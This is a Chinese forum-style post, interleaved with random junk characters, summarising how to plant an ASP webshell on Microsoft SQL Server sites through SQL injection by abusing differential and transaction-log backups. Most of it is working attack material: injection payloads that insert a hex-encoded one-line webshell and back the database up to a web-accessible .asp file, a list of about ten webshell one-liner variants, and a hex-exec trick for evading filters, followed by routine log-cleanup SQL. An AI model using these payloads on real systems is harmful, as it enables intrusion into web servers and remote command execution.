MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
* G7 Q! T* k4 n3 k$ t+ Kbackup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
3 n5 z' m# C4 w" ]' P- dcreate table [dbo].[dtest] ([cmd] [image]);
5 t" N! K3 ~) v6 E4 l- u# a. einsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
7 C5 f  I/ w- O$ P
2 t9 q( J) ]" F; q: y7 Y3.进行差异备份
2 H* [0 A" [1 {. a" Y7 ~1 Abackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

& z/ p: Z' Z4 J$ V# ^7 i上面
, M- a4 E3 r! z9 P* L1 ^7 \0x3C25657865637574652872657175657374282261222929253E
( i: l- R8 G4 H1 ]/ H$ l2 S就是一句话木马的内容：<%execute(request("a"))%>
2 H2 X! J& ~/ H4 Q
如下是网上常见的差异备份代码，思路一样！
===================================================
2 k! m6 u* a& V+ K8 c" f) y利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
9 C" t9 @# z3 k- A( L0 s2 n" }
6 |  h& s( _6 l% d, ^declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

  x$ K& ~# o7 A  N2 G, i2 e& r4 dcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


8 ?  x( O5 B0 d7 n: q- s: minsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

0 i9 W/ E; Y4 u! f  W2 c* cdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
1 T; u9 O2 O+ p7 o; v
drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
+ J' x4 c" N3 ?4 u<%execute(request("a"))%>
4 \* A% H* ]+ w( g) Y===============================================================
$ S, u8 B7 L$ J( ^
我发现上面代码，有时会无效，而直接用
! }$ J$ C3 k* B( \! ], ]
9 u) W1 u9 H$ ?backup database 库名 to disk = 'c:\ddd.bak'

# m% K& V3 {6 E3 ?/ dcreate table [dbo].[dtest] ([cmd] [image]);
8 ~+ G& K5 a+ c( \7 q; T9 b
+ J& u/ }  H6 Vinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

0 @3 A' w; b4 K# d  w- P/ K# N却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
( E# t0 t6 Z, [
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

1 g  \; W; Y4 b9 R/ t+ K) J4 L网上还有log增量备份的，我也把他记录一下
( E0 }% k* J7 s0 S% |( F# x7 q( u# {0 ?=====================================================
& G" X( h2 O, a8 i另一种log增量备份技术:
" B& R0 C/ U8 j- i9 Q
5 B" H/ l. v5 ?+ z8 P';alter database null set RECOVERY FULL--
2 g7 D& |# S  }
  Y# z, t7 Q- x, Z4 _2 E' R: _';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

9 I$ }# o% r5 T; S+ ]2 G';backup log null to disk = '备份路径'--
1 g* |5 w3 K- S
3 x5 C/ s$ q4 x';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

) r( u8 @- l, T' [, J. oPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
! k9 }  Z0 l5 ^+ f+ i" F
5 u, s0 `( x: [; K3 o说到一句话马，还可以有这么几种写法：
1 ~- s. t& a  K' K. n/ ~
a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
$ _3 D# }* f1 o0 P: S- @4 n  ld)<script language=VBScript runat=server>execute request("a")</script>
9 C/ |/ V) E3 W- oe)<%25Execute(request("a"))%25>
1 `* t4 D! _) {0 H8 R3 Of)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
" D$ R3 y/ T4 _8 Wh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
/ P6 }# F  d: t/ _J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================
% ]$ T6 J" g1 s' V* Y4 Z" [$ z- _
当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

8 Z5 w9 W% Z+ i  ], C. o/ m- l( {把要执行的语句转16进制然后用exec执行
% H, E9 B# \8 q8 w' G/ x
3 h5 B5 `) ~( S" E3 g; _/ g
减少备份文件大小方法如下:
: z! [, b6 k/ [( D
总的来说就是那么简单几句,下面以备份数据库model为例子
) |1 J* n  [. n( X4 G' a3 }; X( h1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
% t7 X6 M- R9 Y( Q' n& [# l2
4 I) v8 y( r% f- u( e# d, ^id=1;backup database model to disk='你的路径‘ with differential,format;--


9 D  u9 B" b! i- y) \' W
SQL语句清理日志
# h2 {% G! I7 U5 |& D注：test为数据库名

1 V: l- ~+ K2 [8 z7 @--清空日志
DUMP TRANSACTION test WITH NO_LOG
) \2 a0 W* }/ U
--截断事务日志
+ G4 i. e9 R: B$ `BACKUP LOG test WITH NO_LOG

  k# a6 F2 W( f--收缩数据库
: y; @: `* {2 Q: P8 gDBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
0 Y  ~8 ?3 y$ Z1 t- V- y5 vEXEC sp_dboption 'test', 'autoshrink', 'TRUE'